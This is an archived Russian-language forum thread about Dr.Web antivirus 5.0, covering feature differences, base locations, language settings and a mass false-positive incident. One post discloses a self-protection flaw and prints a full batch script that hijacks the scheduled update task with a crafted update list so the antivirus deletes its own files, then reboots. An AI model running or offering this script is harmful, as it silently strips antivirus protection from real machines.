Показать полную графическую версию : Dr.Web
Страниц :
1
2
3
4
5
6
7
[
8]
9
Grey_rnd, Ну собственно отличие в том, что Security Space оснащён ещё двумя опциями- SpIDer Gate – антивирусный HTTP-сторож. При настройках по умолчанию SpIDer Gate автоматически проверяет входящий и исходящий HTTP-трафик и блокирует передачу объектов, содержащих вредоносные программы и присутствует функция Родительский контроль. С помощью данного компонента осуществляется ограничение доступа пользователя к ресурсам, содержащимся как локально, на самом ПК, так и в сети. Некие функции фаервола.
Grey_rnd
21-01-2010, 08:05
При настройках по умолчанию SpIDer Gate автоматически проверяет входящий и исходящий HTTP-трафик и блокирует передачу объектов, содержащих вредоносные программы и присутствует функция Родительский контроль. С помощью данного компонента осуществляется ограничение доступа пользователя к ресурсам, содержащимся как локально, на самом ПК, так и в сети. Некие функции фаервола. »
Хм...насколько я видел Родительский контроль присутствует и в антивире, только настроек к ней нет, но где то в опциях я видел чекбокс (правда неактивный,т.е. не подсвеченный для измкенений) с устаровленной в нем галочкой.
А разве антивирь не проверяет входящий трафик? Допустим при загрузке страничек к примеру Opera создаются tmp файлы, которые непосредственно SpiderGuard сканирует сразу же.
Дело в том, что фаер у меня есть Outpost Pro 2009,соответственно каккие то функции блокировки загрузки вредоносных элементов он содержит. Я так понимаю что SS в таком случае мне не особо нужен?
Хм...насколько я видел Родительский контроль присутствует и в антивире, только настроек к ней нет »
В Security Space настройки на эту функцию точно работают. У меня установлен на одной из систем v. 5.0.1.11171.
А разве антивирь не проверяет входящий трафик? Допустим при загрузке страничек к примеру Opera создаются tmp файлы, которые непосредственно SpiderGuard сканирует сразу же. »
SpIDer Guard – антивирусный сторож (называемый также монитором). Программа постоянно находится в оперативной памяти, осуществляя проверку файлов "на лету", а также обнаруживая проявления вирусной активности. Собственно да, если вы используете сторонний фаервол, и он соответствующе настроен и нормально справляется со своими задачами, то думаю, что для вас функция SpIDer Gate не имеет особой надобности.
Здравствуйте.
Подскажите пожалуйста, где в Windows 7 находятся антивирусные базы DrWeb 5.0. В WinXP они хранились в C:\Documents And Settings\All Users\Application Data\Doctor Web\Bases, а в Вынь7 не могу найти, как не старался.
Спасибо.
samurai, посмотри (http://new-forum.drweb.com/mod/forum/thread/?id=271397&fid=2) может это?
посмотри может это? »
Нифига там не понял. Впечатление, что разговор о другом.
Petya V4sechkin
30-01-2010, 09:53
\ProgramData\Doctor Web\Bases
Обновление вручную — wiki.drweb.com (http://wiki.drweb.com/index.php/%D0%9E%D0%B1%D0%BD%D0%BE%D0%B2%D0%BB%D0%B5%D0%BD%D0%B8%D0%B5_%D0%B2%D1%80%D1%83%D1%87%D0%BD%D1%83%D1 %8E)
Grey_rnd
30-01-2010, 10:00
samurai, C:\ProgramData\Doctor Web\Bases
P.S.Petya V4sechkin, сорри не увидел, что Вы уже ответили.
\ProgramData\Doctor Web\Bases
Обновление вручную — wiki.drweb.com »
Спасибо.
Здравствуйте.
Хочу поставить Security Space аглицкую, но т.к. система Вынь7х64Рус то по умолчанию ставится русская. Как сделать, чтобы ставилась аглицкая?
Спасибо.
volk1234
21-02-2010, 00:00
Английский язык влючен в программу по умолчанию, независимо от языка установки. Во первых можно выбрать язык при установке - надо только выбрать пользовательскую установку.
Или после установки в SpIDer Agent самый нижний пункт - Инструменты -настройки - и там можно поменять язык интерфейса...
neokolyan
09-03-2010, 14:35
Уже дней десять по найденной уязвимости самозащиты Drweb5 их техподдержка молчит, а сообщение на форуме тупо удалили без уведомления. Игнор. Ну что ж... Может быть мне здесь помогут "залатать" эту дырочку. Нужно как-то заставить самозащиту веба защищать задачу в планировщике ОС, которая отвечает за обновление. Копия стёртого и заигноренного сообщения в техподдержке ниже:
=====================================================
Самозащита на задаче в Планировщике задач не стоит [Dr.Web Update]. Это означает, что после запуска примерно вот такого батника (ниже) антивирус сам себя уничтожит. Конечно, чтобы сделать это, надо обойти UAC, если он вообще не выключен, и иметь права администратора (а кто их дома не имеет?). Но самозащита тут скромно смолчит, а потом её самой не станет вместе с вебом. Планируют ли разработчики это исправить? Очень уж легко получается эту "самозащиту" обойти=(
CODE
md c:\killme
echo [DrWebUpdateList]>c:\killme\drweb32.lst
echo [500]>>c:\killme\drweb32.lst
echo -timestamp,>>c:\killme\drweb32.lst
echo -update.drl,>>c:\killme\drweb32.lst
echo -drweb32.dll,>>c:\killme\drweb32.lst
echo -*.vdb,>>c:\killme\drweb32.lst
echo -drw433*.*,>>c:\killme\drweb32.lst
echo -dwr433*.*,>>c:\killme\drweb32.lst
echo -dwn433*.*,>>c:\killme\drweb32.lst
echo -drw444*.*,>>c:\killme\drweb32.lst
echo -dwr444*.*,>>c:\killme\drweb32.lst
echo -dwn444*.*,>>c:\killme\drweb32.lst
echo -drw*.txt,>>c:\killme\drweb32.lst
echo -dwr*.txt,>>c:\killme\drweb32.lst
echo -dwn*.txt,>>c:\killme\drweb32.lst
echo -dwshield.sys,>>c:\killme\drweb32.lst
echo -spiderui.dll,>>c:\killme\drweb32.lst
echo -<wnt>%SYSDIR%\drivers\drwebnet.sys,>>c:\killme\drweb32.lst
echo -<wnt>%SYSDIR%\spider.cpl,>>c:\killme\drweb32.lst
echo -drwspcnt.dll,>>c:\killme\drweb32.lst
echo -<wnt>%SYSDIR%\drivers\dwprot.sys,>>c:\killme\drweb32.lst
echo -<wnt>dwprot.dll,>>c:\killme\drweb32.lst
echo -<wnt>%CommonProgramFiles%\Doctor Web\Scanning Engine\dwengine.exe,>>c:\killme\drweb32.lst
echo -<wnt>%CommonProgramFiles%\Doctor Web\Scanning Engine\dwinctl.dll,>>c:\killme\drweb32.lst
echo -<wnt>spideragent.exe,>>c:\killme\drweb32.lst
echo -<wnt>spideragent_set.exe,>>c:\killme\drweb32.lst
echo -drweb32w.exe,>>c:\killme\drweb32.lst
echo -drwebwcl.exe,>>c:\killme\drweb32.lst
echo -<wnt>dwebllio.dll,>>c:\killme\drweb32.lst
echo -drwsxtn.dll,>>c:\killme\drweb32.lst
echo -drwadins.exe,>>c:\killme\drweb32.lst
echo -<wnt>spidernt.exe,>>c:\killme\drweb32.lst
echo -<wnt>spiderui.exe,>>c:\killme\drweb32.lst
echo -<wnt>spidercpl.exe,>>c:\killme\drweb32.lst
echo -<wnt>spider.sys,>>c:\killme\drweb32.lst
echo -spiderml.exe,>>c:\killme\drweb32.lst
echo -spml_set.exe,>>c:\killme\drweb32.lst
echo -drwebsp.dll,>>c:\killme\drweb32.lst
echo -*.dwl,>>c:\killme\drweb32.lst
echo -*.wav,>>c:\killme\drweb32.lst
echo -drwreg.exe,>>c:\killme\drweb32.lst
echo -drweb32.key,>>c:\killme\drweb32.lst
echo -DRWEBUPW.exe,>>c:\killme\drweb32.lst
echo [DrWebUpdateListEnd]>>c:\killme\drweb32.lst
schtasks.exe /change /ru system /tn "Dr.Web Update" /tr "\"C:\Program Files\DrWeb\DrWebUpW.exe\" /go /st /qu /reg- /rp+drwebupw.log /URL:\"C:\killme\""
schtasks.exe /Run /TN "Dr.Web Update"
ping 127.0.0.1
shutdown -r -t 1
Похожий скрипт для 64-хбитной семерки удалил практически всё. Скриншот после перезагрузки прилагается....
Сегодня этот глюкнутый антивирус обвалил более 200 компов (Win XP) за 30 минут!!! Он определил вирус в файле C:\WINDOWS\system32\dsound.dll, после чего все компы начали виснуть один за другим!!!
А может проблема в руках? По подробней что и как...
Зы. Да и для др.веба есть отдельные темы. Зачем создавать новую?? О_о
А может проблема в руках? »
в ногах!!!
По подробней что и как... »
Сегодня этот глюкнутый антивирус обвалил более 200 компов (Win XP) за 30 минут!!! Он определил вирус в файле C:\WINDOWS\system32\dsound.dll, после чего все компы начали виснуть один за другим!!! »
подробнее некуда!!!
З.Ы. Почитай тут (http://forum.drweb.com/index.php?showtopic=291692), только что нарыл.
zai, И что теперь? Идти в представительство DrWEB и бить сотрудников? В свое время Касперский после обновления стал блокировать explorer.exe - ничего, пережили. И это переживем. Тем более, что никто не заставляет вроде пользоваться им под дулом револьвера?
ЗЫ: все 200 копий - лицензионные? Позвони в техподдержку - мож, получишь официальные извинения от г-на Данилова. :)
zai, да и поправили уже. Завязывай паниковать.
все 200 копий - лицензионные? »
Даже больше!!!
Позвони в техподдержку - мож, получишь официальные извинения от г-на Данилова »
Мне его извинения не нужны, через 3 недели заканчивается лицензия и продлевать я ее в этом году не буду. Куплю другой антивирус. Вот и все!!!
З.Ы. Сегодня я просто в бешенстве!!!
В общем тему можно закрывать
zai, остынь. Подобные инциденты бывают, периодически. Далеко не факт, что
другой антивирус »
не вычистит тебе молча любимый софтсклад от кейгенов, не заблокирует доступ любимой программы в инет или... просто отморозится от нагло бродящих по системе вирусов. Так что - не спеши с выводами)
Все привет! Удалил Веба,а в "Сетевых адаптерах" остались его "следы".Как удалить все это(скрин)
Rubichek
06-07-2011, 12:53
Здравствуйте, сеть из 3 пк без инета как обновлять вирусные базы dr.web как настроить?
© OSzone.net 2001-2012
vBulletin v3.6.4, Copyright ©2000-2025, Jelsoft Enterprises Ltd.